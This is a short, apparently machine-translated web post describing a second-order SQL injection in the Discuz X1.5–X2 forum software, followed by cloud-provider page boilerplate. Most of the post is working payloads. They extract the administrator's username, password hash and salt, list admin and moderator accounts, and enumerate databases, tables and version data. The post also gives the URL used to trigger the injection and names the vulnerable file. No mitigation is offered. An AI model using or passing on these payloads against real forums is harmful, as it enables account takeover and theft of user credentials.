Second injection of Discuz x1.5-x2

Source: Internet
Author: User

A', 'subobject' = (/*! Select */concat (username, '|', password, '|', salt) from pre_ucenter_members where uid = 1 limit 0, 1), comment ='
 
 
Then, some statements are provided.
 
', 'Subobject' = (/*! Select */group_concat (uid, ':') from pre_common_member where groupid = 1), comment = '// view the Management User
', 'Subobject' = (/*! Select */group_concat (uid, ':') from pre_common_member where groupid = 2), comment = '// super moderator
', 'Subobject' = (/*! Select */group_concat (uid, ':') from pre_common_member where groupid = 3), comment = '// super moderator
', 'Subobject' = (/*! Select */table_name from information_schema.tables where table_schema = 0x0000 limit 0, 1), comment = '// run the table
', 'Subobject' = (/*! Select */group_concat (schema_name) from information_schema.schemata), comment = '// obtain all databases
', 'Subobject' = (/*! Select */concat (@ version, ':', user (), ':', database (), comment = '// version information
 
Then, add the injection statement to the reply and supplement.
Supplemental address:

Forum. php? Mod = misc & tid = {tid} & action = postappend & pid = {pid}
 
The preceding statement writes the obtained content into the reply topic and returns the result.
Vulnerability files:
Source \ module \ forum \ forum_misc.php

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.